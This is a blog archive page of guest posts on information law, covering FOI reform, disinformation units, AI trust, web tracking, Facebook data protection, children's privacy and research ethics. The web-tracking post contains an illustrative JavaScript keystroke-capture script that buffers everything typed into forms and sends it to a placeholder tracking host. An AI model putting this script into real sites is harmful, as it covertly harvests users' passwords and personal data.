Category Archives: Guest post

Steve Goodrich: FOI is under attack when it should be strengthened

In this guest post, Transparency International UK’s Steve Goodrich considers UK citizens’ right to access information, arguing that public money should be put towards examining how the Freedom of Information regime can be improved, not weakened.

The right to access information held by the state, public officers and providers of state services is an essential part of a functioning democracy. It provides citizen-led checks and balances on concentrations of power, without which corruption would be allowed to thrive; allows citizens to make informed judgements about the efficacy of governments and elected representatives; and helps hold institutions and officials to account for their actions. It is therefore perplexing that the UK Government – with its welcome and newfound interest in tackling corruption – appears intent on watering down the Freedom of Information Act.

In July this year, Lord Bridges announced that the UK Government was establishing an ‘independent Commission’ to review whether the Act provided a ‘safe space’ for Ministers and civil servants to develop and discuss policy. This might sound perfectly reasonable – why shouldn’t a law be reviewed after a decade in operation? – but the announcement left out some important details.

Firstly, there has already been post-legislative scrutiny of the Act. The Justice Select Committee did a thorough job back in 2012, taking 140 pieces of written evidence and hearing oral evidence from 37 witnesses over 7 evidence sessions. After talking to a range of individuals and organisations, the Committee concluded that there are sufficient protections for deliberation within public bodies. The Information Commissioner and Information Tribunal are both mindful of the need to ensure this ‘safe space’ exists – which is already provided for in the Act – and Cabinet minutes are not routinely released. Considering this, it’s slightly baffling that the government wants the issue examined again, and so soon after the last review.

Secondly, one of the reasons cited for re-examining the Act is the Supreme Court’s recent decision in the case of the Prince Charles ‘spider memos’. After the Upper Tribunal had ordered the government to disclose these documents, the Attorney General, Dominic Grieve, tried to exercise the Ministerial veto – something intended for rare and limited circumstances. However, on appeal the Supreme Court ruled that the veto could not apply because it was never intended to be an executive override of a judgment of the judiciary. As the Supreme Court’s judgment notes, it is a long-standing principle of the rule of law that the executive should only be allowed to do this in very specific circumstances where the power to do so is clear and explicit. That is not the case in the FOI Act.

Essentially, the review seems to be partly inspired by sour grapes. The government lost a disagreement with the courts, and its solution is to make the case for re-writing the law so that it can ignore them in future when it suits. The public interest is noticeably absent from its motivations.

Thirdly, the composition and conduct of the Commission has raised some eyebrows. Members include Jack Straw, who has publicly criticised the Act, and Michael Howard whose expenses for gardening services were revealed through FOI. There are no major advocates of the Act on the panel.

The Commission has also adopted some opaque practices during the initial stages of its inquiry, including providing anonymous briefings to members of the press and considering anonymising evidence. Until civil society expressed concerns about the Commission in September, it wasn’t even planning to take external evidence and had the suspiciously ambitious deadline of November 2015 to report to government. Since then, it has opened itself up to submissions and its deadline for reporting appears to have disappeared. However, the damage has already been done – Transparency International UK has no confidence in the impartiality and independence of the Commission.

The saddest thing about this whole episode is that it has been a missed opportunity. If public money is going to be spent on reviewing the Act, it should be put towards examining how it can be improved, not weakened. For example, there are growing transparency gaps in our public institutions, with the private sector providing an increasing amount of goods and services. Although there are some circumstances where these companies can be subject to information requests, they are limited. This is why the Act should be extended to cover private companies where they provide public services.

Recently, Labour announced that it intends to set up its own Commission on FOI, which will look at the Act as a whole, including how it can be strengthened. This is a welcome development. However, as with the government’s Commission, its members and their conduct must command the confidence of civil society and government if its findings are ever to be realised.

Steve Goodrich is Transparency International UK’s (TI-UK) Senior Research Officer. He is responsible for leading TI-UK’s research into lobbying, open data and state accountability. He spoke at ‘Freedom of Information: Extending Transparency to the Private Sector’ on 28 September 2015, an event co-organised by the Bingham Centre for the Rule of Law and the IALS Information Law and Policy Centre.

  • For other resources on FOI and the private sector please follow this link
  • Our blog posts give the view of the author, and do not represent the position of the Information Law and Policy Centre or the Institute of Advanced Legal Studies.

British government’s new ‘anti-fake news’ unit has been tried before – and it got out of hand

In this guest post, Dan Lomas, Programme Leader, MA Intelligence and Security Studies, University of Salford, explores the British government’s new ‘anti-fake news’ unit.

The decision to set up a new National Security Communications Unit to counter the growth of “fake news” is not the first time the UK government has devoted resources to exploiting the defensive and offensive capabilities of information. A similar thing was tried in the Cold War era, with mixed results.

The planned unit has emerged as part of a wider review of defence capabilities. It will reportedly be dedicated to “combating disinformation by state actors and others” and was agreed at a meeting of the National Security Council (NSC).

As a spokesperson for UK prime minister Theresa May told journalists:

We are living in an era of fake news and competing narratives. The government will respond with more and better use of national security communications to tackle these interconnected, complex challenges.

Continue reading

AI trust and AI fears: A media debate that could divide society

In this guest post, Dr Vyacheslav Polonski, Researcher at the University of Oxford, examines the key question of whether we trust or fear AI.

We are at a tipping point of a new digital divide. While some embrace AI, many people will always prefer human experts even when they’re wrong.

Unless you live under a rock, you probably have been inundated with recent news on machine learning and artificial intelligence (AI). With all the recent breakthroughs, it almost seems like AI can already predict the future. Police forces are using it to map when and where crime is likely to occur. Doctors can use it to predict when a patient is most likely to have a heart attack or stroke. Researchers are even trying to give AI imagination so it can plan for unexpected consequences.

Of course, many decisions in our lives require a good forecast, and AI agents are almost always better at forecasting than their human counterparts. Yet for all these technological advances, we still seem to deeply lack confidence in AI predictions. Recent cases show that people don’t like relying on AI and prefer to trust human experts, even if these experts are wrong.

If we want AI to really benefit people, we need to find a way to get people to trust it. To do that, we need to understand why people are so reluctant to trust AI in the first place.

Continue reading

A Prediction about Predictions

In this guest post, Marion Oswald offers her homage to Yes Minister and, in that tradition, smuggles in some pertinent observations on AI fears. This post first appeared on the SCL website’s Blog as part of Laurence Eastham’s Predictions 2018 series. It is also appearing in Computers & Law, December/January issue.

Continue reading

How websites watch your every move and ignore privacy settings

In this guest post, Yijun Yu, Senior Lecturer in the Department of Computing and Communications at The Open University, examines the world’s top websites and their routine tracking of a user’s every keystroke, mouse movement and input into a web form – even if it’s later deleted.

Hundreds of the world’s top websites routinely track a user’s every keystroke, mouse movement and input into a web form – even before it’s submitted or later abandoned, according to the results of a study from researchers at Princeton University.

And there’s a nasty side effect: personally identifiable data, such as medical information, passwords and credit card details, could be revealed when users surf the web – without them knowing that companies are monitoring their browsing behaviour. It’s a situation that should alarm anyone who cares about their privacy.

The Princeton researchers found it was difficult to redact personally identifiable information from browsing behaviour records – even, in some instances, when users have switched on privacy settings such as Do Not Track.
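Technically, such “session replay” tracking needs nothing exotic: a third-party script registers a listener for input events, buffers everything a visitor types, and periodically posts the batch to a collection server – whether or not the form is ever submitted. The sketch below is purely illustrative; the function names, batching interval and endpoint are assumptions for this post, not code from the Princeton study or any vendor:

```javascript
// Illustrative sketch of session-replay-style keystroke capture.
// The buffering logic is kept as a pure function; the DOM wiring
// only runs in a browser.

function createRecorder() {
  const events = [];
  return {
    record(type, value) {
      // Every input event is captured, including text the user later deletes.
      events.push({ type, value, at: Date.now() });
    },
    flush() {
      // Return and clear the batch that would be sent to the tracking server.
      const batch = events.slice();
      events.length = 0;
      return batch;
    },
  };
}

const recorder = createRecorder();

// Browser-only wiring: capture keystrokes in every form field on the page,
// before any form is submitted. Note that nothing here consults
// navigator.doNotTrack – the setting is advisory, so a script is free
// to ignore it.
if (typeof document !== "undefined") {
  document.addEventListener("input", (e) => {
    recorder.record("input", e.target.value);
  });
  setInterval(() => {
    const batch = recorder.flush();
    if (batch.length > 0) {
      // e.g. navigator.sendBeacon("https://tracker.example/collect",
      //                           JSON.stringify(batch));
    }
  }, 2000);
}
```

Because the listener fires on every input event rather than on form submission, the abandoned or deleted text described above reaches the tracker just the same.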

Continue reading

Who’s responsible for what happens on Facebook? Analysis of a new ECJ opinion

In this guest post, Lorna Woods, Professor of Internet Law at the University of Essex, provides an analysis of a new ECJ opinion. This post first appeared on the blog of Steve Peers, Professor of EU, Human Rights and World Trade Law at the University of Essex.

Who is responsible for data protection law compliance on Facebook fan sites? That issue is analysed in a recent opinion of an ECJ Advocate-General, in the case of Wirtschaftsakademie (full title: Unabhängiges Landeszentrum für Datenschutz Schleswig-Holstein v Wirtschaftsakademie Schleswig-Holstein GmbH, in the presence of Facebook Ireland Ltd, Vertreter des Bundesinteresses beim Bundesverwaltungsgericht).

This case is one more in a line of cases dealing specifically with the jurisdiction of national data protection supervisory authorities, a line of reasoning which seems to operate separately from the Brussels I Recast Regulation, which concerns the jurisdiction of courts over civil and commercial disputes. While this is an Advocate-General’s opinion, and therefore not binding on the Court, if followed by the Court it would consolidate the Court’s prior broad interpretation of the Data Protection Directive. While this might be the headline, it is worth considering a perhaps overlooked element of the data economy: the role of the content provider in supplying the individuals whose data is harvested.

Continue reading

Guilty until proven innocent? How a legal loophole is being used to name and shame children

In this guest post, Faith Gordon, University of Westminster, explores how, under UK law, a child’s anonymity is not entirely guaranteed. Faith is speaking at the Information Law and Policy Centre’s annual conference – Children and Digital Rights: Regulating Freedoms and Safeguards – this Friday, 17 November.

Under the 1948 Universal Declaration of Human Rights, each individual is presumed innocent until proven guilty. A big part of protecting this principle is guaranteeing that public opinion is not biased against someone who is about to be tried in the courts. In this situation, minors are particularly vulnerable and need all the protection that can be legally offered. So when you read stories about cases involving children, they are often accompanied by the line that the accused cannot be named for legal reasons.

However, a loophole exists: a minor can be named before being formally charged. And as we all know in this digital age, being named comes with consequences – details or images shared of the child are permanent. While the Data Protection Bill gives children the strongest version of the right to be forgotten, children and young people know that when their images and posts are screenshotted they have little or no control over how they are used and who has access to them.

Continue reading

Ethical issues in research using datasets of illicit origin

In this guest post Dr Daniel R. Thomas, University of Cambridge reviews research surrounding ethical issues in research using datasets of illicit origin. This post first appeared on “Light Blue Touchpaper” weblog written by researchers in the Security Group at the University of Cambridge Computer Laboratory.

On Friday at IMC I presented our paper “Ethical issues in research using datasets of illicit origin” by Daniel R. Thomas, Sergio Pastrana, Alice Hutchings, Richard Clayton, and Alastair R. Beresford. We conducted this research after thinking about some of these issues in the context of our previous work on UDP reflection DDoS attacks.

Data of illicit origin is data obtained by illicit means, such as exploiting a vulnerability or an unauthorised disclosure; in our previous work this was leaked databases from booter services. We analysed existing guidance on ethics, and papers that used data of illicit origin, to see what issues researchers are encouraged to discuss and what issues they did discuss. We find wide variation in current practice. We encourage researchers using data of illicit origin to include an ethics section in their paper: to explain why the work was ethical, so that the research community can learn from it. At present, in many cases the positive benefits as well as the potential harms of research remain entirely unidentified. Few papers record explicit Research Ethics Board (REB) (aka IRB/Ethics Committee) approval for the activity described, and the justifications given for exemption from REB approval suggest deficiencies in the REB process. It is also important to focus on the “human participants” of research rather than the narrower “human subjects” definition, as not all the humans that might be harmed by research are its direct subjects.

The paper and the slides are available.

Too much information? More than 80% of children have an online presence by the age of two

In this guest post, Claire Bessant, Northumbria University, Newcastle, looks into the phenomenon of ‘sharenting’. Her article is relevant to the Information Law and Policy Centre’s annual conference coming up in November – Children and Digital Rights: Regulating Freedoms and Safeguards.

A toddler with birthday cake smeared across his face grins delightedly at his mother. Minutes later, the image appears on Facebook. A not uncommon scenario – 42% of UK parents share photos of their children online, with half of these parents sharing photos at least once a month.

Welcome to the world of “sharenting” – where more than 80% of children are said to have an online presence by the age of two. This is a world where the average parent shares almost 1,500 images of their child online before their fifth birthday.

But while a recent report from OFCOM confirms many parents do share images of their children online, the report also indicates that more than half (56%) of parents don’t. Most of these non-sharenting parents (87%) actively choose not to do so to protect their children’s private lives.

Continue reading

Has Facebook finally given up chasing teenagers? It’s complicated

In this guest post, Harry T Dyer, University of East Anglia, looks into the complicated relationship between social media and young people. His article is relevant to the Information Law and Policy Centre’s annual conference coming up in November – Children and Digital Rights: Regulating Freedoms and Safeguards.

Facebook’s latest attempt to appeal to teens has quietly closed its doors. The social media platform’s Lifestage app (so unsuccessful that this is probably the first time you’ve heard of it) was launched a little under a year ago to resounding apathy and has struggled ever since.

Yet, as is Silicon Valley’s way, Facebook has rapidly followed the failure of one venture with the launch of another one by unveiling a new video streaming service. Facebook Watch will host series of live and pre-recorded short-form videos, including some original, professionally made content, in a move that will allow the platform to more directly compete with the likes of YouTube, Netflix and traditional TV channels.

Lifestage was just one of a long series of attempts by Facebook to stem the tide of young people increasingly interacting across multiple platforms. With Watch, the company seems to have changed tack from this focus on retaining young people, instead targeting a much wider user base. Perhaps Facebook has learnt that it will simply never be cool – but that doesn’t mean it can’t still be popular.

Continue reading

Why the very idea of ‘screen time’ is muddled and misguided

In this guest post, Dr Natalia Kucirkova (UCL) and Professor Sonia Livingstone (London School of Economics and Political Science) explore why ‘screen time’ is an outdated term and why we need to recognise the power of learning through screen-based technologies. Their article is relevant to the Information Law and Policy Centre’s annual conference coming up in November – Children and Digital Rights: Regulating Freedoms and Safeguards.

The idea of “screen time” causes arguments – but not just between children and their anxious parents. The Children’s Commissioner for England, Anne Longfield, recently compared overuse of social media to junk food and urged parents to regulate screen time using her “Digital 5 A Day” campaign.

This prompted the former director of Britain’s electronic surveillance agency, GCHQ, to respond by telling parents to increase screen time for children so they can gain skills to “save the country”, since the UK is “desperately” short of engineers and computer scientists.

Meanwhile, parents are left in the middle, trying to make sense of it all.

Continue reading